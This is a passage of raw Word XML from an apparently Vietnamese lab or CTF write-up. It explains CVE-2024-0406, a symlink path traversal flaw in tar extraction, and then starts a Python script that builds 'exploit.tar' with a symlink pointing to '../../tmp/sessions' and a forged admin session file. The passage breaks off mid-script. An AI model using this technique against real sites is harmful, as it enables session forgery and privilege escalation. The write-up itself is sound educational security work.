                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4325620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D027C1" w14:textId="4A5E4F58" w:rsidR="00504F70" w:rsidRDefault="00504F70" w:rsidP="00A17786">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sau đó mình đã thực hiện tìm kiếm trên google và phát hiện một vài cve liên quan đến </w:t>
      </w:r>
      <w:r w:rsidR="00A17786">
        <w:t>thư viện này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234D6D9E" w14:textId="019716B6" w:rsidR="0007566C" w:rsidRDefault="0007566C" w:rsidP="00183EB3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA7AD5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C4EFC9E" wp14:editId="3DF895E3">
            <wp:extent cx="5731510" cy="1950085"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="396180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80989" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1950085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E0482C" w14:textId="66E6DFF5" w:rsidR="00A17786" w:rsidRPr="00A17786" w:rsidRDefault="00A17786" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A17786">
        <w:t xml:space="preserve">Mô tả của lỗ hổng này như sau: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6139D524" w14:textId="77777777" w:rsidR="00D971B9" w:rsidRPr="00D971B9" w:rsidRDefault="00D971B9" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D971B9">
        <w:t>CVE-2024-0406 mô tả một lỗ hổng path traversal nghiêm trọng trong quá trình giải nén file .tar bằng thư viện archiver. Lỗi xảy ra khi thư viện không kiểm tra hoặc làm sạch các liên kết tượng trưng (symlink) bên trong file nén.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B2AC6F" w14:textId="77777777" w:rsidR="00D971B9" w:rsidRPr="00D971B9" w:rsidRDefault="00D971B9" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D971B9">
        <w:t>Kẻ tấn công có thể tạo một file .tar chứa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8DD673" w14:textId="77777777" w:rsidR="00D971B9" w:rsidRPr="00D971B9" w:rsidRDefault="00D971B9" w:rsidP="00FC0750">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D971B9">
        <w:t>Một symlink trỏ ra ngoài thư mục đích</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B68AF21" w14:textId="5C6A984E" w:rsidR="00D971B9" w:rsidRPr="00D971B9" w:rsidRDefault="00D971B9" w:rsidP="00FC0750">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D971B9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Một file ghi đè vào đường dẫn thông qua </w:t>
      </w:r>
      <w:r w:rsidR="004D16CA">
        <w:t>symlink</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113A64A7" w14:textId="6CB162FD" w:rsidR="0007566C" w:rsidRPr="0007566C" w:rsidRDefault="0007566C" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0007566C">
        <w:t xml:space="preserve">Một tệp </w:t>
      </w:r>
      <w:r w:rsidR="00095A6E">
        <w:t>TAR</w:t>
      </w:r>
      <w:r w:rsidRPr="0007566C">
        <w:t xml:space="preserve"> được tạo thủ công có thể được trích xuất theo cách ghi các tệp vào hệ thống bị ảnh hưởng với cùng đặc quyền như ứng dụng đang thực thi chức năng dễ bị tấn công này. Do đó, các tệp nhạy cảm có thể bị ghi đè, có khả năng dẫn đến leo thang đặc quyền, thực thi mã và các hậu quả nghiêm trọng khác trong một số trường hợp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B375E49" w14:textId="532AC1D2" w:rsidR="003F08A0" w:rsidRPr="003F08A0" w:rsidRDefault="00095A6E" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bây giờ mình sẽ nói 1 chút về symlink: </w:t>
      </w:r>
      <w:r w:rsidRPr="00095A6E">
        <w:t>Symlink (viết tắt của symbolic link) là một loại liên kết ảo trong hệ thống tệp (file system), cho phép một file hoặc thư mục trỏ tới một file hoặc thư mục khác — giống như một "đường dẫn tắt".</w:t>
      </w:r>
      <w:r w:rsidR="003F08A0">
        <w:t xml:space="preserve"> Nghĩa là khi </w:t>
      </w:r>
      <w:r w:rsidR="003F08A0" w:rsidRPr="003F08A0">
        <w:t xml:space="preserve">truy cập symlink, hệ thống sẽ </w:t>
      </w:r>
      <w:r w:rsidR="003F08A0" w:rsidRPr="004D16CA">
        <w:t xml:space="preserve">tự động chuyển hướng tới </w:t>
      </w:r>
      <w:r w:rsidR="003F08A0" w:rsidRPr="003F08A0">
        <w:t xml:space="preserve">đích mà nó trỏ </w:t>
      </w:r>
      <w:r w:rsidR="003F08A0">
        <w:t>tới. Nó tương tự như các shortcut trên màn hình máy tính vậy, khi ta ấn vào sẽ chuyển tới</w:t>
      </w:r>
      <w:r w:rsidR="004D16CA">
        <w:t xml:space="preserve"> 1 cụ thể và thực thi nó. Vì vậy, khi ta tạo </w:t>
      </w:r>
      <w:r w:rsidR="001064F0">
        <w:t xml:space="preserve">1 file có symlink trỏ tới thu mục nhạy cảm trên hệ thống, ta có thể truy cập vào nó. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C68CBAD" w14:textId="3628DF93" w:rsidR="00095A6E" w:rsidRPr="00095A6E" w:rsidRDefault="00095A6E" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17695581" w14:textId="778492EB" w:rsidR="0007566C" w:rsidRDefault="001064F0" w:rsidP="00FC0750">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bây giờ mình sẽ tạo 1 file </w:t>
      </w:r>
      <w:r w:rsidR="00D57260">
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> python </w:t>
      </w:r>
      <w:r w:rsidR="00FE7251">
        <w:t xml:space="preserve">thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="00ED2E49">
        <w:t>tạ</w:t>
      </w:r>
      <w:r w:rsidR="00FE7251">
        <w:t xml:space="preserve">o 1 file nén tar </w:t>
      </w:r>
      <w:r w:rsidR="00ED2E49">
        <w:t>chứa 1 file session giả có symlink trỏ đến thư mục chứa sessions của trang web:</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FC3232" w:rsidRPr="00FC3232" w14:paraId="53377E23" w14:textId="77777777" w:rsidTr="00FC3232">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69142224" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00FC3232">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="446EAA4D" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6488230A" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55B51305" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EA77F3C" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AC8E12A" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2772BCDC" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77C40B07" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36E7F3D8" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B82794F" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5774D5B7" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3837BDCC" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D791FAA" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AC08D75" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07FF8D09" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71D24957" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B547BDA" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63202DBD" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="648799CE" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41244E20" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28D5F6BF" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3367BE0D" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:lastRenderedPageBreak/>
              <w:t>22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DF2C932" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t>23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="561D6026" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t>24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FFE7B9B" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t>25</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20D8AF12" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t>26</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33C0FD23" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t>27</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DBBF904" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t>28</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F4CC4FF" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t>29</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F2E73D5" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t>30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="741E7C55" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t>31</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5094AD6F" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t>32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72CE4C2B" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>import</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>tarfile</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F4D0D72" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>import</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A09CA1E" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232"/>
          <w:p w14:paraId="649BDCE7" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve">username = </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"abcdef"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A767B6F" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve">session_id = </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"abcdef"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E6A3248" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232"/>
          <w:p w14:paraId="0B17CFA6" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t># Nội dung session giả mạo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B85BE77" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t>session_data = {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44E8A6AF" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"username"</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:t>: username,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C4F5E0B" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"id"</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:t>: 3,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BD796FF" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"role"</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"admin"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18C8AE06" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65C8D98B" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232"/>
          <w:p w14:paraId="654EA0A1" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t># Ghi ra file tạm</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1475395A" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>with</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve"> open(</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"fake_session.json"</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"w"</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve">) </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>as</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve"> f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7025E4A5" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve">    json.dump(session_data, f)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78C17B8F" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232"/>
          <w:p w14:paraId="31AE1343" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t># Tạo file .tar chứa symlink + file giả</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E25C3FB" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>with</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve"> tarfile.open(</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"exploit.tar"</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"w"</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve">) </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>as</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve"> tar:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09DC81CD" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t># Tạo symlink trỏ đến file session thật</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B6C54A3" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve">    symlink_name = session_id</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35F7CFC6" w14:textId="473D2930" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    target_path = </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>f"../../../../../../tmp/sessions/</w:t>
            </w:r>
            <w:r w:rsidR="00916604">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>{username}</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:t>session_id</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3232">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EEAC1C2" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232"/>
          <w:p w14:paraId="0F181FB9" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve">    info = tarfile.TarInfo(name=symlink_name)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B85B395" w14:textId="77777777" w:rsidR="00FC3232" w:rsidRPr="00FC3232" w:rsidRDefault="00FC3232" w:rsidP="00FC3232">
            <w:r w:rsidRPr="00FC3232">
              <w:t xml:space="preserve">    info.type = tarfile.SYMTYPE</w:t>
            </w:r>
          </w:p>
